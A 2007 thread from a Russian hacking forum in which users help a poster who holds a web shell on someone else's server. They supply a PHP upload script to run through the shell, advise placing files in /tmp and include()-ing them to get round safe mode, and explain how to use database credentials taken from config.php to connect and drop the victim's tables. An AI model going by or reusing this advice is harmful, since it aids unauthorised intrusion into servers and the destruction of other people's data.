Форум АНТИЧАТ - Помощь с PHP Кодом

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помощь с PHP Кодом (https://forum.antichat.xyz/showthread.php?t=31070)

antiforum

11.01.2007 23:36

Помощь с PHP Кодом

Продолжение истории с шеллом:
http://forum.antichat.ru/thread31056.html

Что бы не оффтопить в той теме - открываю еще одну.

Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

Т.е. все что я могу - это выполнять код php.

Посоветуйте что можно сделать в таких условиях.

Constantine

11.01.2007 23:42

т.е чтобы не оффтопить в одной теме, ты решил оффтопить в двух. Оригинально

genom--

12.01.2007 00:16

а написать код на php которые записывает файл и таким образом его залить на серв нельзя да =)

p-range

12.01.2007 00:19

Вот код:

Код:

<?php

set_time_limit(0);

echo <<<HTML

<form enctype="multipart/form-data" action="$self" method="POST">

<input type="hidden" name="ac" value="upload">

<center><b><font color=red> Загругзка файла на сервер </font></b><center>  <br>

<tr>

<td><b>File:</td>

<td><input size="48" name="file" type="file"></td>

</tr>

<tr>

<td>Path:</b></td>

<td><input size="48" name="path" type="text"><input type="submit" value="OK"></td><br>

HTML;



if (isset($_POST['path'])){



$uploadfile = $_POST['path'].$_FILES['file']['name'];

if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}



if (copy($_FILES['file']['tmp_name'], $uploadfile)) {

    echo "OK $uploadfile\n";

    echo "Name:" .$_FILES['file']['name']. "\n";

    echo "Ves:" .$_FILES['file']['size']. "\n";



} else {

    print "Error:\n";

    print_r($_FILES);

}

}

?>

EXSlim

12.01.2007 01:12

->Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

cd /tmp
Туда и заливай.

p-range

12.01.2007 01:20

Цитата:

cd /tmp
Туда и заливай.

потом include("/tmp/file.php");

antiforum

12.01.2007 13:46

Ребята спасибо за ответы, буду разгребать.

Еще, у меня есть данные от базы данных, а так как шелл находится на локалхосте - то я могу без проблем к нему подключится....

Можно ли средствами php, подключисвшись к базе - стереть ее допустим?

ettee

12.01.2007 17:21

Можно, необходимо знать логин и пароль для подключения. Обычно подключения из вне запрещены.

Код:

$host = "localhost"; // место расположения MySql

 $db_name = "grol"; // имя базы

 $db_user = "grol"; // пользователь базы

 $db_password = "admin"; // пароль пользователя

 $table_online = "online"; // имя таблицы

 // соединяемся с MySQL и выбираем нужную базу

 mysql_connect($host,$db_user,$db_password) or die(mysql_error());

 mysql_select_db($db_name) or die(mysql_error())

//http://phpfaq.ru/mysql

Abra	12.01.2007 17:57

логин и пароль соответственно ищи в файлах типа config.php движка который ее использует.

blackybr

12.01.2007 18:16

ettee прав ) соединяешься с бд, а потом с помощью

mysql_query("ЗАПРОС"); делаешь в бд что хочешь )

например удалить таблицу

mysql_query("DROP название таблицы");

и тд

antiforum

13.01.2007 04:45

Всем спасибо за помощь.

m0nzt3r

13.01.2007 20:37

Ну значит закрыто.

Время: 02:11